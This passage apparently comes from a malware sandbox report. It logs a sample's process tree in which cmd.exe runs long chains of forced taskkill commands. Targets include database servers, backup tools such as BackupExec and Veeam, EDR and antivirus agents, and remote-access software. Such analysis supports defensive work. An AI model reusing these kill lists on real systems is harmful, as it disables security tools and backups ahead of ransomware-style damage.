Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F 
& @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & 
@taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T"3⤵
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM VBoxSDS.exe /F | depth 4
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM mysqld.exe /F | depth 4
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM TeamViewer_Service.exe /F | depth 4
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM TeamViewer.exe /F | depth 4
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM CasLicenceServer.exe /F | depth 4
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM tv_w32.exe /F | depth 4
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM tv_x64.exe /F | depth 4
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM rdm.exe /F | depth 4
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM SecureCRT.exe /F | depth 4
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM SecureCRTPortable.exe /F | depth 4
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM VirtualBox.exe /F | depth 4
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM VBoxSVC.exe /F | depth 4
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM VirtualBoxVM.exe /F | depth 4
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM abs_deployer.exe /F | depth 4
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM edr_monitor.exe /F | depth 4
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM sfupdatemgr.exe /F | depth 4
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM ipc_proxy.exe /F | depth 4
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM edr_agent.exe /F | depth 4
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM edr_sec_plan.exe /F | depth 4
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM sfavsvc.exe /F | depth 4
  - Kills process with taskkill
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F | depth 4
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM DataShareBox.ShareBoxService.exe /F | depth 4
- C:\Windows\SysWOW64\taskkill.exe | taskkill /IM Jointsky.CloudExchangeService.exe /F | depth 4
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & @taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & 
@taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill 
/IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"3⤵
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM BackupExec.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM Att.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM mdm.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM BackupExecManagementService.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM bengine.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM benetns.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM beserver.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM pvlsvr.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM bedbg.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM beremote.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM beremote.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM beremote.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM RemoteAssistProcess.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM BarMoniService.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM beremote.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM GoodGameSrv.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM BarCMService.exe /F  (level 4)
- Kills process with taskkill
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM TsService.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM GoodGame.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM BarServerView.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM IcafeServicesTray.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM BsAgent_0.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM ControlServer.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM DisklessServer.exe /F  (level 4)
C:\Windows\SysWOW64\cmd.exe  cmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"  (level 3)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM pg_ctl.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM rcrelay.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM SogouImeBroker.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM CCenter.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM ScanFrm.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM d_manage.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM RsTray.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM wampmanager.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM RavTray.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM mssearch.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM sqlmangr.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM msftesql.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM SyncBaseSvr.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM oracle.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM TNSLSNR.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM SyncBaseConsole.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM aspnet_state.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM AutoBackUpEx.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM redis-server.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM MySQLNotifier.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM oravssw.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM fppdis5.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM His6Service.exe /F  (level 4)
C:\Windows\SysWOW64\cmd.exe  cmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"  (level 3)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM ThunderPlatform.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM iexplore.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM vm-agent.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM vm-agent-daemon.exe /F  (level 4)
- Kills process with taskkill
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM eSightService.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM cygrunsrv.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM wrapper.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM nginx.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM node.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM sshd.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM vm-tray.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM iempwatchdog.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM sqlwriter.exe /F  (level 4)
- Kills process with taskkill
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM php.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM "notepad++.exe" /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM "phpStudy.exe" /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM OPCClient.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM navicat.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM SupportAssistAgent.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM SunloginClient.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM SOUNDMAN.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM WeChat.exe /F  (level 4)
C:\Windows\SysWOW64\taskkill.exe  taskkill /IM TXPlatform.exe /F  (level 4)
